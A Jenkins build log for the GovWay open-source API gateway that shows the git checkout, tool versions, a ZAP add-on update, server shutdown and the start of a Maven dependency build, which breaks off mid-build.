17:35:28 Started by GitHub push by andreapoli 17:35:28 Running as SYSTEM 17:35:28 Building in workspace /var/lib/jenkins/workspace/GovWay 17:35:28 [WS-CLEANUP] Clean-up disabled, skipping workspace deletion. 17:35:28 The recommended git tool is: NONE 17:35:28 No credentials specified 17:35:28 > /usr/bin/git rev-parse --resolve-git-dir /var/lib/jenkins/workspace/GovWay/.git # timeout=10 17:35:28 Fetching changes from the remote Git repository 17:35:28 > /usr/bin/git config remote.origin.url https://github.com/link-it/govway.git # timeout=10 17:35:28 Fetching upstream changes from https://github.com/link-it/govway.git 17:35:28 > /usr/bin/git --version # timeout=10 17:35:28 > git --version # 'git version 2.47.1' 17:35:28 > /usr/bin/git fetch --tags --force --progress -- https://github.com/link-it/govway.git +refs/heads/*:refs/remotes/origin/* # timeout=10 17:35:30 > /usr/bin/git rev-parse origin/3.4.x^{commit} # timeout=10 17:35:30 Checking out Revision 6c9a57eb237970f5bd0560a207039603d6778d2b (origin/3.4.x) 17:35:30 > /usr/bin/git config core.sparsecheckout # timeout=10 17:35:30 > /usr/bin/git checkout -f 6c9a57eb237970f5bd0560a207039603d6778d2b # timeout=10 17:35:31 Commit message: "[GovWayConsole] Corretto un problema nel Controllo Accessi di erogazioni ModI con profilo PDND/OAuth, dove il campo "Stato" dell'Autenticazione Token risultava erroneamente modificabile su API con risorse definite in versioni precedenti del prodotto." 17:35:31 > /usr/bin/git rev-list --no-walk 1e1bbba2f77e07deb7a493f4db2a18679042b3b1 # timeout=10 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 Run condition [Boolean condition] enabling prebuild for step [BuilderChain] 17:35:31 [GovWay] $ /bin/bash /tmp/jenkins4781757799009687134.sh 17:35:31 ============================= 17:35:31 General Info 17:35:31 Workspace: /var/lib/jenkins/workspace/GovWay 17:35:31 Build: true 17:35:31 Deploy: true 17:35:31 Test: true 17:35:31 Test Integrazione: true 17:35:31 ============================= 17:35:31 17:35:31 ============================= 17:35:31 Environment Info 17:35:31 HOME: /var/lib/jenkins 17:35:31 ANT_OPTS: -Xmx1024m -XX:MaxMetaspaceSize=700m -XX:+UseG1GC 17:35:31 MAVEN_OPTS: 17:35:31 SOFTHSM2_CONF: /home/ec2-user/lib/softhsm/softhsm2.conf 17:35:31 SONAR_SCANNER_OPTS: 17:35:31 ============================= 17:35:31 17:35:31 ============================= 17:35:31 Java 17:35:31 openjdk version "21.0.7" 2025-04-15 LTS 17:35:31 OpenJDK Runtime Environment Temurin-21.0.7+6 (build 21.0.7+6-LTS) 17:35:31 OpenJDK 64-Bit Server VM Temurin-21.0.7+6 (build 21.0.7+6-LTS, mixed mode, sharing) 17:35:31 ============================= 17:35:31 17:35:31 ============================= 17:35:31 Maven 17:35:32 Apache Maven 3.0.5 (Red Hat 3.0.5-17) 17:35:32 Maven home: /usr/share/maven 17:35:32 Java version: 21.0.7, vendor: Eclipse Adoptium 17:35:32 Java home: /opt/openjdk-21.0.7+6 17:35:32 Default locale: en_US, platform encoding: UTF-8 17:35:32 OS name: "linux", version: "4.14.94-89.73.amzn2.x86_64", arch: "amd64", family: "unix" 17:35:32 ============================= 17:35:32 17:35:32 ============================= 17:35:32 ANT 17:35:33 Apache Ant(TM) version 1.10.15 compiled on August 25 2024 17:35:33 ============================= 17:35:33 17:35:33 ============================= 17:35:33 Git Info 17:35:33 Url: https://github.com/link-it/govway.git 17:35:33 branch: origin/3.4.x 17:35:33 commit: 6c9a57eb237970f5bd0560a207039603d6778d2b 17:35:33 previuos commit: 1e1bbba2f77e07deb7a493f4db2a18679042b3b1 17:35:33 previuos successful commit: 1e1bbba2f77e07deb7a493f4db2a18679042b3b1 17:35:33 commit message: [GovWayConsole] 17:35:33 Corretto un problema nel Controllo Accessi di erogazioni ModI con profilo PDND/OAuth, 17:35:33 dove il campo "Stato" dell'Autenticazione Token risultava erroneamente modificabile su API con risorse definite in versioni precedenti del prodotto. 17:35:33 ============================= 17:35:33 17:35:33 ============================= 17:35:33 NODEjs Info 17:35:33 v22.14.0 17:35:34 { 17:35:34 npm: '10.9.2', 17:35:34 node: '22.14.0', 17:35:34 acorn: '8.14.0', 17:35:34 ada: '2.9.2', 17:35:34 amaro: '0.3.0', 17:35:34 ares: '1.34.4', 17:35:34 brotli: '1.1.0', 17:35:34 cjs_module_lexer: '1.4.1', 17:35:34 cldr: '46.0', 17:35:34 icu: '76.1', 17:35:34 llhttp: '9.2.1', 17:35:34 modules: '127', 17:35:34 napi: '10', 17:35:34 nbytes: '0.1.1', 17:35:34 ncrypto: '0.0.1', 17:35:34 nghttp2: '1.64.0', 17:35:34 nghttp3: '1.6.0', 17:35:34 ngtcp2: '1.10.0', 17:35:34 openssl: '3.0.15+quic', 17:35:34 simdjson: '3.10.1', 17:35:34 simdutf: '6.0.3', 17:35:34 sqlite: '3.47.2', 17:35:34 tz: '2024b', 17:35:34 undici: '6.21.1', 17:35:34 unicode: '16.0', 17:35:34 uv: '1.49.2', 17:35:34 uvwasi: '0.0.21', 17:35:34 v8: '12.4.254.21-node.22', 17:35:34 zlib: '1.3.0.1-motley-82a5fec' 17:35:34 } 17:35:34 ============================= 17:35:34 17:35:34 ============================= 17:35:34 OWASP ZAP Info 'ZAP_2.17.0' 17:35:34 Associo diritti di esecuzione agli script zap ... 17:35:34 Associati diritti di esecuzione agli script zap 17:35:34 Update ... 17:35:34 Execute: /opt/openjdk-21.0.7+6/bin/java -classpath /opt/zaproxy/ZAP_2.17.0/*:/opt/zaproxy/ZAP_2.17.0/lib/* org.zaproxy.zap.ZAP -cmd -addonupdate -port 8280 -host 127.0.0.1 17:35:37 Defaulting ZAP install dir to /opt/zaproxy/ZAP_2.17.0 17:35:59 Add-on update check complete 17:36:05 Update effettuato 17:36:05 ============================= 17:36:05 17:36:05 17:36:05 17:36:05 Fermo application server ... 17:36:05 Stoping Tomcat 17:36:05 WARNING: package java.net.HttpURLConnection not in java.base 17:36:07 Pid Tomcat: 25518 17:36:07 17:36:08 waiting for processes to gracefully shutdown (0/60) 17:36:09 waiting for processes to gracefully shutdown (1/60) 17:36:10 waiting for processes to gracefully shutdown (2/60) 17:36:11 waiting for processes to gracefully shutdown (3/60) 17:36:12 waiting for processes to gracefully shutdown (4/60) 17:36:13 waiting for processes to gracefully shutdown (5/60) 17:36:14 waiting for processes to gracefully shutdown (6/60) 17:36:15 waiting for processes to gracefully shutdown (7/60) 17:36:16 waiting for processes to gracefully shutdown (8/60) 17:36:17 waiting for processes to gracefully shutdown (9/60) 17:36:19 waiting for processes to gracefully shutdown (10/60) 17:36:20 waiting for processes to gracefully shutdown (11/60) 17:36:21 waiting for processes to gracefully shutdown (12/60) 17:36:22 waiting for processes to gracefully shutdown (13/60) 17:36:23 waiting for processes to gracefully shutdown (14/60) 17:36:24 waiting for processes to gracefully shutdown (15/60) 17:36:25 waiting for processes to gracefully shutdown (16/60) 17:36:26 waiting for processes to gracefully shutdown (17/60) 17:36:27 waiting for processes to gracefully shutdown (18/60) 17:36:28 waiting for processes to gracefully shutdown (19/60) 17:36:29 waiting for processes to gracefully shutdown (20/60) 17:36:30 waiting for processes to gracefully shutdown (21/60) 17:36:31 waiting for processes to gracefully shutdown (22/60) 17:36:32 waiting for processes to gracefully shutdown (23/60) 17:36:33 waiting for processes to gracefully shutdown (24/60) 17:36:34 waiting for processes to gracefully shutdown (25/60) 17:36:35 waiting for processes to gracefully shutdown (26/60) 17:36:36 waiting for processes to gracefully shutdown (27/60) 17:36:37 waiting for processes to gracefully shutdown (28/60) 17:36:38 waiting for processes to gracefully shutdown (29/60) 17:36:39 waiting for processes to gracefully shutdown (30/60) 17:36:40 waiting for processes to gracefully shutdown (31/60) 17:36:41 waiting for processes to gracefully shutdown (32/60) 17:36:42 waiting for processes to gracefully shutdown (33/60) 17:36:43 waiting for processes to gracefully shutdown (34/60) 17:36:44 waiting for processes to gracefully shutdown (35/60) 17:36:45 waiting for processes to gracefully shutdown (36/60) 17:36:46 waiting for processes to gracefully shutdown (37/60) 17:36:47 waiting for processes to gracefully shutdown (38/60) 17:36:48 waiting for processes to gracefully shutdown (39/60) 17:36:49 waiting for processes to gracefully shutdown (40/60) 17:36:50 waiting for processes to gracefully shutdown (41/60) 17:36:52 waiting for processes to gracefully shutdown (42/60) 17:36:53 waiting for processes to gracefully shutdown (43/60) 17:36:54 waiting for processes to gracefully shutdown (44/60) 17:36:55 waiting for processes to gracefully shutdown (45/60) 17:36:56 waiting for processes to gracefully shutdown (46/60) 17:36:57 waiting for processes to gracefully shutdown (47/60) 17:36:58 waiting for processes to gracefully shutdown (48/60) 17:36:59 waiting for processes to gracefully shutdown (49/60) 17:37:00 waiting for processes to gracefully shutdown (50/60) 17:37:01 waiting for processes to gracefully shutdown (51/60) 17:37:02 waiting for processes to gracefully shutdown (52/60) 17:37:03 waiting for processes to gracefully shutdown (53/60) 17:37:04 waiting for processes to gracefully shutdown (54/60) 17:37:05 waiting for processes to gracefully shutdown (55/60) 17:37:06 waiting for processes to gracefully shutdown (56/60) 17:37:07 waiting for processes to gracefully shutdown (57/60) 17:37:08 waiting for processes to gracefully shutdown (58/60) 17:37:09 waiting for processes to gracefully shutdown (59/60) 17:37:10 waiting for processes to gracefully shutdown (60/60) 17:37:10 Gracefully shutdown didn't stop tomcat after 60 seconds 17:37:10 Terminating Tomcat 17:37:10 Pid Tomcat: 25518 17:37:10 17:37:11 waiting for processes to terminate (0/20)Fermo application server effettuato 17:37:11 Ripulisco log application server ... 17:37:11 Ripulisco log application server effettuato 17:37:11 Predispongo dir testsuite ... 17:37:11 Predispongo dir testsuite ok 17:37:11 Ripulisco output jacoco ... 17:37:11 Ripulisco output jacoco effettuato 17:37:11 Fermo sonarqube ... 17:37:11 17:37:11 Gracefully stopping SonarQube... 17:37:14 Stopped SonarQube. 17:37:14 Fermo sonarqube effettuato 17:37:14 Verifico che il workspace non esista ... 17:37:14 Non e' stata rilevata una corretta re-inizializzazione del Workspace 17:37:14 [Boolean condition] checking [true] against [^(1|y|yes|t|true|on|run)$] (origin token: ${GOVWAY_BUILD}) 17:37:14 Run condition [Boolean condition] enabling perform for step [BuilderChain] 17:37:14 [GovWay] $ /bin/sh -xe /tmp/jenkins5563370864550481880.sh 17:37:14 + perl -pi -e s/log4bash.appender=ColorConsoleAppender/log4bash.appender=ConsoleAppender/g /var/lib/jenkins/workspace/GovWay/distrib/log4bash.properties 17:37:14 + sed -i -e 's#<module>swagger-codegen</module>#<!-- <module>swagger-codegen</module> -->#g' /var/lib/jenkins/workspace/GovWay/mvn/dependencies/pom.xml 17:37:14 + sed -i -e s#UPDATE_DOC=true#UPDATE_DOC=false#g /var/lib/jenkins/workspace/GovWay/distrib/distrib.sh 17:37:14 + sed -i -e s#DB_VERSION=postgresql,mysql,oracle,hsql,sqlserver,db2#DB_VERSION=postgresql,mysql,oracle,hsql,sqlserver#g /var/lib/jenkins/workspace/GovWay/ant/setup/prepare-build.properties 17:37:14 [GovWay] $ /opt/apache-maven-3.9.10/bin/mvn initialize 17:37:16 [INFO] Scanning for projects... 17:37:17 [INFO] ------------------------------------------------------------------------ 17:37:17 [INFO] Reactor Build Order: 17:37:17 [INFO] 17:37:17 [INFO] govway [pom] 17:37:17 [INFO] dependencies [pom] 17:37:17 [INFO] dependencies.ant [pom] 17:37:17 [INFO] dependencies.antinstaller [pom] 17:37:17 [INFO] dependencies.angus [pom] 17:37:17 [INFO] dependencies.bean-validation [pom] 17:37:17 [INFO] dependencies.cxf [pom] 17:37:17 [INFO] dependencies.commons [pom] 17:37:17 [INFO] dependencies.console [pom] 17:37:17 [INFO] dependencies.git [pom] 17:37:17 [INFO] dependencies.httpcore [pom] 17:37:17 [INFO] dependencies.jackson [pom] 17:37:17 [INFO] dependencies.jakarta [pom] 17:37:17 [INFO] dependencies.jaxb [pom] 17:37:17 [INFO] dependencies.jetty [pom] 17:37:17 [INFO] dependencies.jmx [pom] 17:37:17 [INFO] dependencies.json [pom] 17:37:17 [INFO] dependencies.log [pom] 17:37:17 [INFO] dependencies.lucene [pom] 17:37:17 [INFO] dependencies.openapi4j [pom] 17:37:17 [INFO] dependencies.opensaml [pom] 17:37:17 [INFO] dependencies.pdf [pom] 17:37:17 [INFO] dependencies.redis [pom] 17:37:17 [INFO] dependencies.reports [pom] 17:37:17 [INFO] dependencies.saaj [pom] 17:37:17 [INFO] dependencies.security [pom] 17:37:17 [INFO] dependencies.shared [pom] 17:37:17 [INFO] dependencies.spring [pom] 17:37:17 [INFO] dependencies.spring-ldap [pom] 17:37:17 [INFO] dependencies.spring-security [pom] 17:37:17 [INFO] dependencies.swagger [pom] 17:37:17 [INFO] dependencies.wss4j [pom] 17:37:17 [INFO] dependencies.testsuite [pom] 17:37:17 [INFO] dependencies.testsuite.axis14 [pom] 17:37:17 [INFO] dependencies.testsuite.as [pom] 17:37:17 [INFO] dependencies.testsuite.as.wildfly27 [pom] 17:37:17 [INFO] dependencies.testsuite.as.wildfly28 [pom] 17:37:17 [INFO] dependencies.testsuite.as.wildfly35 [pom] 17:37:17 [INFO] dependencies.testsuite.as.wildfly36 [pom] 17:37:17 [INFO] dependencies.testsuite.as.wildfly37 [pom] 17:37:17 [INFO] dependencies.testsuite.as.wildfly38 [pom] 17:37:17 [INFO] dependencies.testsuite.as.wildfly39 [pom] 17:37:17 [INFO] dependencies.testsuite.as.tomcat10 [pom] 17:37:17 [INFO] dependencies.testsuite.as.tomcat11 [pom] 17:37:17 [INFO] dependencies.testsuite.test [pom] 17:37:17 [INFO] dependencies.testsuite.test.testng [pom] 17:37:17 [INFO] dependencies.testsuite.test.junit4 [pom] 17:37:17 [INFO] dependencies.testsuite.test.karate09 [pom] 17:37:17 [INFO] dependencies.testsuite.test.logback [pom] 17:37:17 [INFO] dependencies.testsuite.test.httpcore4 [pom] 17:37:17 [INFO] dependencies.testsuite.test.spring5 [pom] 17:37:17 [INFO] dependencies.testsuite.test.spring-ldap2 [pom] 17:37:17 [INFO] dependencies.testsuite.test.apacheds [pom] 17:37:17 [INFO] dependencies.testsuite.test.cxf3 [pom] 17:37:17 [INFO] dependencies.testsuite.staticAnalysis [pom] 17:37:17 [INFO] dependencies.testsuite.dynamicAnalysis [pom] 17:37:17 [INFO] dependencies.testsuite.coverage [pom] 17:37:17 [INFO] compile [pom] 17:37:17 [INFO] package [pom] 17:37:17 [INFO] testsuite.utils [pom] 17:37:17 [INFO] testsuite.utils.sql [pom] 17:37:17 [INFO] testsuite.pdd.core [pom] 17:37:17 [INFO] testsuite.pdd.core.sql [pom] 17:37:17 [INFO] static_analysis.spotbugs [pom] 17:37:17 [INFO] static_analysis.sonarqube [pom] 17:37:17 [INFO] dynamic_analysis.zap [pom] 17:37:17 [INFO] coverage.jacoco [pom] 17:37:17 [INFO] 17:37:17 [INFO] ------------------< org.openspcoop2:org.openspcoop2 >------------------- 17:37:17 [INFO] Building govway 1.0 [1/67] 17:37:17 [INFO] from pom.xml 17:37:17 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:17 [INFO] 17:37:17 [INFO] ------------< org.openspcoop2:org.openspcoop2.dependencies >------------ 17:37:17 [INFO] Building dependencies 1.0 [2/67] 17:37:17 [INFO] from mvn/dependencies/pom.xml 17:37:17 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:17 [INFO] 17:37:17 [INFO] ----------------< org.openspcoop2:org.openspcoop2.ant >----------------- 17:37:17 [INFO] Building dependencies.ant 1.0 [3/67] 17:37:17 [INFO] from mvn/dependencies/ant/pom.xml 17:37:17 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:17 [INFO] 17:37:17 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.ant --- 17:37:18 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/ant (includes = [*.jar], excludes = []) 17:37:18 [INFO] 17:37:18 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.ant --- 17:37:20 [INFO] 17:37:20 [INFO] ------------< org.openspcoop2:org.openspcoop2.antinstaller >------------ 17:37:20 [INFO] Building dependencies.antinstaller 1.0 [4/67] 17:37:20 [INFO] from mvn/dependencies/antinstaller/pom.xml 17:37:20 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:20 [INFO] 17:37:20 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.antinstaller --- 17:37:20 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/antinstaller (includes = [*.jar], excludes = []) 17:37:20 [INFO] 17:37:20 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.antinstaller --- 17:37:20 [INFO] 17:37:20 [INFO] ---------------< org.openspcoop2:org.openspcoop2.angus >---------------- 17:37:20 [INFO] Building dependencies.angus 1.0 [5/67] 17:37:20 [INFO] from mvn/dependencies/angus/pom.xml 17:37:20 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:20 [INFO] 17:37:20 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.angus --- 17:37:20 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/angus (includes = [*.jar], excludes = []) 17:37:20 [INFO] 17:37:20 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.angus --- 17:37:20 [INFO] 17:37:20 [INFO] ----------< org.openspcoop2:org.openspcoop2.bean-validation >----------- 17:37:20 [INFO] Building dependencies.bean-validation 1.0 [6/67] 17:37:20 [INFO] from mvn/dependencies/bean-validation/pom.xml 17:37:20 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:20 [INFO] 17:37:20 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.bean-validation --- 17:37:20 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/bean-validation (includes = [*.jar], excludes = []) 17:37:20 [INFO] 17:37:20 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.bean-validation --- 17:37:20 [INFO] 17:37:20 [INFO] ----------------< org.openspcoop2:org.openspcoop2.cxf >----------------- 17:37:20 [INFO] Building dependencies.cxf 1.0 [7/67] 17:37:20 [INFO] from mvn/dependencies/cxf/pom.xml 17:37:20 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:20 [INFO] 17:37:20 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.cxf --- 17:37:20 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/cxf (includes = [*.jar], excludes = []) 17:37:20 [INFO] 17:37:20 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.cxf --- 17:37:20 [INFO] 17:37:20 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.cxf --- 17:37:21 [INFO] Executing tasks 17:37:21 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/cxf/cxf-core-4.1.3.jar 17:37:21 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/cxf/cxf-rt-rs-security-jose-4.1.3.jar 17:37:21 [INFO] Executed tasks 17:37:21 [INFO] 17:37:21 [INFO] --------------< org.openspcoop2:org.openspcoop2.commons >--------------- 17:37:21 [INFO] Building dependencies.commons 1.0 [8/67] 17:37:21 [INFO] from mvn/dependencies/commons/pom.xml 17:37:21 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:21 [INFO] 17:37:21 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.commons --- 17:37:21 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/commons (includes = [*.jar], excludes = []) 17:37:21 [INFO] 17:37:21 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.commons --- 17:37:21 [INFO] 17:37:21 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.commons --- 17:37:21 [INFO] Executing tasks 17:37:21 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/commons/commons-jcs3-core-3.2.1.jar 17:37:21 [INFO] Executed tasks 17:37:21 [INFO] 17:37:21 [INFO] --------------< org.openspcoop2:org.openspcoop2.console >--------------- 17:37:21 [INFO] Building dependencies.console 1.0 [9/67] 17:37:21 [INFO] from mvn/dependencies/console/pom.xml 17:37:21 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:21 [INFO] 17:37:21 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.console --- 17:37:21 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/console (includes = [*.jar], excludes = []) 17:37:21 [INFO] 17:37:21 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.console --- 17:37:21 [INFO] 17:37:21 [INFO] ----------------< org.openspcoop2:org.openspcoop2.git >----------------- 17:37:21 [INFO] Building dependencies.git 1.0 [10/67] 17:37:21 [INFO] from mvn/dependencies/git/pom.xml 17:37:21 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:22 [INFO] 17:37:22 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.git --- 17:37:22 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/git (includes = [*.jar], excludes = []) 17:37:22 [INFO] 17:37:22 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.git --- 17:37:22 [INFO] 17:37:22 [INFO] --------------< org.openspcoop2:org.openspcoop2.httpcore >-------------- 17:37:22 [INFO] Building dependencies.httpcore 1.0 [11/67] 17:37:22 [INFO] from mvn/dependencies/httpcore/pom.xml 17:37:22 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:22 [INFO] 17:37:22 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.httpcore --- 17:37:22 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/httpcore (includes = [*.jar], excludes = []) 17:37:22 [INFO] 17:37:22 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.httpcore --- 17:37:22 [INFO] 17:37:22 [INFO] --------------< org.openspcoop2:org.openspcoop2.jackson >--------------- 17:37:22 [INFO] Building dependencies.jackson 1.0 [12/67] 17:37:22 [INFO] from mvn/dependencies/jackson/pom.xml 17:37:22 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:22 [INFO] 17:37:22 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jackson --- 17:37:22 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jackson (includes = [*.jar], excludes = []) 17:37:22 [INFO] 17:37:22 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jackson --- 17:37:22 [INFO] 17:37:22 [INFO] --------------< org.openspcoop2:org.openspcoop2.jakarta >--------------- 17:37:22 [INFO] Building dependencies.jakarta 1.0 [13/67] 17:37:22 [INFO] from mvn/dependencies/jakarta/pom.xml 17:37:22 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:22 [INFO] 17:37:22 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jakarta --- 17:37:22 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jakarta (includes = [*.jar], excludes = []) 17:37:22 [INFO] 17:37:22 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jakarta --- 17:37:22 [INFO] 17:37:22 [INFO] ----------------< org.openspcoop2:org.openspcoop2.jaxb >---------------- 17:37:22 [INFO] Building dependencies.jaxb 1.0 [14/67] 17:37:22 [INFO] from mvn/dependencies/jaxb/pom.xml 17:37:22 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:22 [INFO] 17:37:22 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jaxb --- 17:37:22 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jaxb (includes = [*.jar], excludes = []) 17:37:22 [INFO] 17:37:22 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jaxb --- 17:37:22 [INFO] 17:37:22 [INFO] ---------------< org.openspcoop2:org.openspcoop2.jetty >---------------- 17:37:22 [INFO] Building dependencies.jetty 1.0 [15/67] 17:37:22 [INFO] from mvn/dependencies/jetty/pom.xml 17:37:22 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:22 [INFO] 17:37:22 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jetty --- 17:37:22 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jetty (includes = [*.jar], excludes = []) 17:37:22 [INFO] 17:37:22 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jetty --- 17:37:22 [INFO] 17:37:22 [INFO] ----------------< org.openspcoop2:org.openspcoop2.jmx >----------------- 17:37:22 [INFO] Building dependencies.jmx 1.0 [16/67] 17:37:22 [INFO] from mvn/dependencies/jmx/pom.xml 17:37:22 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:23 [INFO] 17:37:23 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jmx --- 17:37:23 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jmx (includes = [*.jar], excludes = []) 17:37:23 [INFO] 17:37:23 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jmx --- 17:37:23 [INFO] 17:37:23 [INFO] ----------------< org.openspcoop2:org.openspcoop2.json >---------------- 17:37:23 [INFO] Building dependencies.json 1.0 [17/67] 17:37:23 [INFO] from mvn/dependencies/json/pom.xml 17:37:23 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:23 [INFO] 17:37:23 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.json --- 17:37:23 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/json (includes = [*.jar], excludes = []) 17:37:23 [INFO] 17:37:23 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.json --- 17:37:23 [INFO] 17:37:23 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.json --- 17:37:23 [INFO] Executing tasks 17:37:23 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/json/json-path-2.9.0.jar 17:37:23 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-2.2.14.jar 17:37:23 [INFO] Executed tasks 17:37:23 [INFO] 17:37:23 [INFO] --- copy-rename:1.0:rename (rename-file-networknt) @ org.openspcoop2.json --- 17:37:23 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-1.5.7.jar to /var/lib/jenkins/workspace/GovWay/lib/json/networknt_json-schema-validator-1.5.7.jar 17:37:23 [INFO] 17:37:23 [INFO] --- copy-rename:1.0:rename (rename-file-github-validator) @ org.openspcoop2.json --- 17:37:23 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-2.2.14-gov4j-1.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_json-schema-validator-2.2.14-gov4j-1.jar 17:37:23 [INFO] 17:37:23 [INFO] --- copy-rename:1.0:rename (rename-file-github-core) @ org.openspcoop2.json --- 17:37:23 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-core-1.2.14.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_json-schema-core-1.2.14.jar 17:37:23 [INFO] 17:37:23 [INFO] --- copy-rename:1.0:rename (rename-file-github-jackson) @ org.openspcoop2.json --- 17:37:23 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/jackson-coreutils-2.0.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_jackson-coreutils-2.0.jar 17:37:23 [INFO] 17:37:23 [INFO] --- copy-rename:1.0:rename (rename-file-github-jackson-equivalence) @ org.openspcoop2.json --- 17:37:23 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/jackson-coreutils-equivalence-1.0.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_jackson-coreutils-equivalence-1.0.jar 17:37:23 [INFO] 17:37:23 [INFO] --- copy-rename:1.0:rename (rename-file-github-uri-template) @ org.openspcoop2.json --- 17:37:23 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/uri-template-0.10.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_uri-template-0.10.jar 17:37:23 [INFO] 17:37:23 [INFO] ----------------< org.openspcoop2:org.openspcoop2.log >----------------- 17:37:23 [INFO] Building dependencies.log 1.0 [18/67] 17:37:23 [INFO] from mvn/dependencies/log/pom.xml 17:37:23 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:23 [INFO] 17:37:23 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.log --- 17:37:23 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/log (includes = [*.jar], excludes = []) 17:37:23 